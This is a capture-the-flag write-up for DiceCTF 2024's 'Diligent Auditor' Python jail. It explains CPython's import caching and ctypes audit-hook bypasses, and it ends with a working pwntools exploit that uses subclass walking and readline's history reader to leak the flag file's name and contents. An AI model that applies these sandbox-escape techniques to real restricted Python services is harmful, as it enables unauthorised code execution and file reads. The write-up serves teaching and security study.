[DiceCTF Quals 2024] Diligent Auditor
Points: 281 (15 solves) Challenge Author: aplet123
I hired an auditor to secure my python interpreter!
from challenge import source
#!/usr/local/bin/python
import os
import sys
import string
mod = input("mod? ")
cod = input("cod? ")
sys.stdin.close()
if len(mod) > 16 or len(cod) > 512 or any(x not in string.ascii_lowercase for x in mod) or any(x not in string.printable for x in cod):
print("nope")
exit(1)
code = f"""
import sys
import os
import inspect
import {mod}
if "_posixsubprocess" in sys.modules:
print("nope")
os._exit(1)
for k in list(sys.modules):
del sys.modules[k]
f = inspect.currentframe()
sys.addaudithook((lambda x: lambda *_: x(1))(os._exit))
for k in f.f_builtins:
f.f_builtins[k] = None
for k in f.f_globals:
if k != "f":
f.f_globals[k] = None
for k in f.f_locals:
f.f_locals[k] = None
del f
del k
{cod}
""".strip()
os.execv(sys.executable, [sys.executable, "-c", code])
Additionally, in the Dockerfile, we can observe that we’re running in
python 3.12 and that the flag has some unknown filename with a known
format flag-*.txt
, in the eventual working directory. The
latter is usually a measure to prevent a pure file read from obtaining
the flag, and encouraging arbitrary code execution for the solution. As
we’ll see, however, full code execution is not needed for this
challenge, as it is possible to first recover the flag filename and then
still perform an arbitrary file read to recover its contents.
from sys import addaudithook as pain
First, let’s have a look and summarize all restrictions that this jail places upon our code.
On the outside, we just have a few sanity checks on our input to be included in the executed code. We can choose a module to be imported, but importantly, it cannot contain underscores or dots. That means that most extension modules and all submodules are already excluded, on the top level. Of course, as long as we have an importable module that eventually transitively imports our target module, there’s no problem with that. On the code itself, there’s just a minor restriction on the used character set, presumably just to play it safe and avoid any weird unicode shenanigans such as weird interpretations of an rtl override character. There are some length restrictions, but nothing too stringent to make us worry.
Then, on the inside, we first have our unrestricted import, before
the pain begins. sys.modules
is checked for the
_posixsubprocess
module having been (transitively)
imported, since it contains the fork_exec
function that
does what it says on the tin, without any audit hooks. Then, the module
cache is cleared (which could probably be done with
sys.modules.clear()
just fine too), before installing a
killer audit hook and clearing out essentially all available variables.
The audit hook does a bit of trickery to hide a reference to
os._exit
where in a closure where it becomes hard to touch
without significant manipulations, to avoid us easily disabling it. To
see what the audit hook prevents us from doing, I suggest you have a
quick look at the table of
events and wondering which of those are actually comprehensively
covered ;) All variables in all of the builtins, globals and
locals are then set to None
, including the imported modules
like sys
or our {mod}
. Observe that even if we
get access to the sys
module, this will not be enough to
get immediate access to our import of choice, as it has been removed
from the sys.modules
cache at this point too.
print(solution.intended(ctypes))
We shall first examine the intended solution, yielding arbitrary code execution, before we move on to the unintended approach of just reading the right file.
One prominent choice of module to make is of course
ctypes
. It allows you to call into C functions, mess with
interpreter internals, and do all around “dangerous things”. But… with
great power come great responsibility auditing. As of the
time of this writing, there are no less than 16 unique audit hook events
defined specifically for ctypes, in the audit hook events list. That
means we can’t just get the address of some object (and while the
builtin id
function gives you the memory address – and
transitively, the standard __repr__
1 –
it is of course audited, with the builtins.id
event), or
resolve the address of a symbol (with dlsym
), or much of
anything else. One thing that does turn out to be possible, is to obtain
pointer through ctypes.byref
, which can be turned into a
proper pointer after some ctypes.cast
. It’s interesting to
observe here that directly passing byref(py_object(()))
into cast
will give a nullpointer, but as long as a some
reference is kept to either the byref
input or result, we
do get a proper pointer.2 This behavior is likely related to
the “reference-stealing” nature of byref
.
From there, we can start calculating offsets to interesting things in
interpreter memory. One of those interesting things would then be the
audit hook, so that we could either mess with the closure variables of
the hook to avoid the exit, overwrite the code, or remove the audit hook
itself altogether. Conveniently enough, the audit hooks defined in
python and added via sys.addaudithook
3 are
stored in a python list4 and not a C linked list, which in
turn means that we can list.clear
it, getting rid of all
those pesky os._exit
calls.
From there, all that remains is to get a handle to os
,
which can even be found in ctypes._os
, and spawn all the
shells we’d like through os.system
.
As an alternative ctypes-based solution, you could observe that,
while ctypes.call_function
is a defined audit hook event,
it does not trigger when you call ctypes.memmove
for instance. This again allows us to overwrite arbitrary interpreter
memory, or, when digging deeper into the type of this object, again get
some address leaks (like ctypes.pythonapi._handle
for
libpython or ctypes.memmove_addr
for libc) and call
arbitrary C functions by constructing new objects of the same type but
with a different address. Like so:
ctypes.memmove.__class__(addr)(arguments)
.5
Finally, it is worth noting that all of this ctypes magic does rely on some functions that trigger audit hooks,6 but only during import, which in this case happens well before any hooks are installed.
And now for something completely different: back to our scheduled unintended solution.
import {mod}
Have you ever considered what goes on inside your python interpreter
when you type those six innocent letters: import
? Maybe you
have, but have you actually looked at the source code yet? Time for a
bit of a journey through the bowels of python! Feel free to skip this if
it gets too long, I’ll make sure to mention the important bits we saw
along the way again when we use them.
As we can verify experimentally with a quick
del __builtins__.__import__
, the first step in importing a
module is calling that function: __import__
. A quick detour
through bltinmodule.c,
we end up in the aptly named import.c.
There, other than dealing with some caching, package and fromlist stuff,
the important call goes to import_find_and_load
, which in
turn – of course – emits an audit hook, and hands things over to the
_frozen_importlib
module, which also goes by the name of importlib._bootstrap
and is actually written in python.
Once in python land, we again check the sys.modules
cache, followed by acquiring a lock to avoid threading interfering with
importing. The _find_and_load_unlocked
function takes over,
again looks at package paths to ensure all parent modules have been
imported, and starts the actual importing “logic”.
When importing, there are several knobs to tweak and things to hook.
First, a ModuleSpec
is needed, which can be found by any
“finder” that has been registered on sys.meta_path
. The
responsibility for a finder is to locate the module in some form, be it
a file path, an entry in a zip file or even some network location and to
return a corresponding spec. All with the find_spec
classmethod. By default, sys.meta_path
contains three
importers:
BuiltinImporter
for – you guessed it – builtin modules.FrozenImporter
for frozen modules. That is, modules written in python by “translated” to C so they don’t depend on importing.py
files. As an example, theimportlib._bootstrap
module we’re now looking in has been frozen as_frozen_importlib
to avoid the import system messing with itself.PathFinder
which lives in an adjacent moduleimportlib._bootstrap_external
and concerns itself with file system loading.
The first two cycle back into C land and essentially follow the normal rules of extensions modules. They define themselves and a module gets created. The last one has some more interesting stuff and is likely more immediately relevant, so let’s follow that rabbit.
As the docstring indicates, this looks at even more hookable things,
including sys.path
specifying where to look for files, and
sys.path_hooks
that allow further customization on how to
interpret the entries thereof, such as looking in the regular file
system or inside of zip files. We also see the first mention of
sys.path_importer_cache
here, which will turn out rather
interesting later. The method itself is simple, and defers to
_get_spec
. That method then starts going through
sys.path
, and querying or populating
sys.path_importer_cache
along the way, storing the
appropriate sys.path_hook
objects for each entry on
sys.path
. Once the appropriate loader is found from that
cache, it is in turn called to produce the requested spec, from the
given location of sys.path
. For convenience, we assume it
is a FileFinder
This FileFinder
can then proceed by enumerating its
directory for any files that would satisfy the requested module. Of
course, it also stores all possibly relevant files in its own cache:
finder._path_cache
. If a file is found (be it
mod.py
, mod.pyc
, mod.so
,
mod/__init__.py
or something else completely), it can then
put all the information together in a module spec, along with the next
object in this long chain: a loader that knows how to load such a file
(e.g. you can have a different Loader class for .py
vs
.pyc
files). Of course, for FileFinder
, it is
also possible to tweak which kinds of loaders it has access to, although
I believe this would need to be addressed at the
sys.path_hooks
level.
Remember where we first had
importlib._bootstrap._find_and_load_module_unlocked
ask for
a spec? We finally found it now! It then does some more things to create
a module object and populate it, all guided by the loader object
provided by the spec, as assembled by the finder,7 and
populate the correct entries in sys.modules
and optional
parent modules. For completeness, I’ll just reference that the loader
drives this through the create_module
and
exec_module
methods. These can in the simplest case just
create a types.ModuleType
and exec
the
obtained code in its namespace.
From cache to history to flag
Now, during all this importing, we’ve seen quite some caching going
on. Starting from the well known sys.modules
, through
sys.path_importer_cache
, up to the _path_cache
of a specific FileFinder
. And of course, those last two
will become quite useful to us. Since python’s working directory is on
sys.path
by default, sys.path_importer
will
contain a FileFinder
entry for that directory, once all
caches have been populated during the first few imports. In turn, that
FileFinder
will have cached a directory listing in its
_path_cache
, including a juicy bit of information: the flag
file name.
Now all that stands in between us and the flag is being able to read
a file, or even just the first line of the file will probably do. Oh,
and getting our hands on the sys
module to access those
caches of course, but most usual tricks via __globals__
on
methods of entries in object.__subclasses__()
will work
there. Annoyingly, open
is also audit hooked. Less
annoyingy, and even luckily, I was already aware of an extension module
and function that would provide me with a file read and no audit hooks,
assuming the module was already imported and available:
readline
. Now, to get access to that function through
object.__subclasses__()
, we’d need to have a class in the
readline
module, of which there are none. So instead, we
find a module that has at least one class and imports
readline
for itself, so that we can find it there. Such
module luckily exists, and for instance rlcompleter
will do
the job. In readline
, we “simply” need to call
read_history_file(flag_filename)
followed by a print of
get_history_item(0)
. A last hurdle was getting to print
things and some weirdly behaving buffering, which I eventually got
around by using sys.stdout.buffer.write
followed by
sys.stdout.buffer.flush
.
And putting all this together, we get a fairly simple piece of exploit code, since most of the hard work was already in our heads, and resolved while reading the cpython source code :)
from pwn import remote, process
PAYLOAD = r"""
subs = os.__class__.__base__.__subclasses__()
sys=[x for x in subs if "BuiltinImporter" in x.__name__][0].load_module.__globals__['sys']
p=[x for x in sys.path_importer_cache['/app']._path_cache if "flag" in x][0]
readline=[x for x in subs if "Completer" in x.__name__][0].__init__.__globals__['readline']
readline.clear_history()
readline.read_history_file("/app/" + p)
sys.stdout.buffer.write(p.encode() + b"\n" + readline.get_history_item(1).__str__().encode() + b"\ntest\n")
sys.stdout.buffer.flush()
""".strip().replace("\n", ";")
io = remote("mc.ax", 31130)
io.sendlineafter(b"mod? ", b"rlcompleter")
io.sendlineafter(b"cod? ", PAYLOAD.encode())
io.stream()
Or, with syntax highlighting to make the payload a bit more readable:
subs = os.__class__.__base__.__subclasses__()
sys=[x for x in subs if "BuiltinImporter" in x.__name__][0].load_module.__globals__['sys']
p=[x for x in sys.path_importer_cache['/app']._path_cache if "flag" in x][0]
readline=[x for x in subs if "Completer" in x.__name__][0].__init__.__globals__['readline']
readline.clear_history()
readline.read_history_file("/app/" + p)
sys.stdout.buffer.write(p.encode() + b"\n" + readline.get_history_item(1).__str__().encode() + b"\ntest\n")
sys.stdout.buffer.flush()
All eventually leading up to the glorious feeling of a flagged challenge.
dice{python_audit_hooks_not_exactly_secure}
, stored inflag-e639626913ad08d1.txt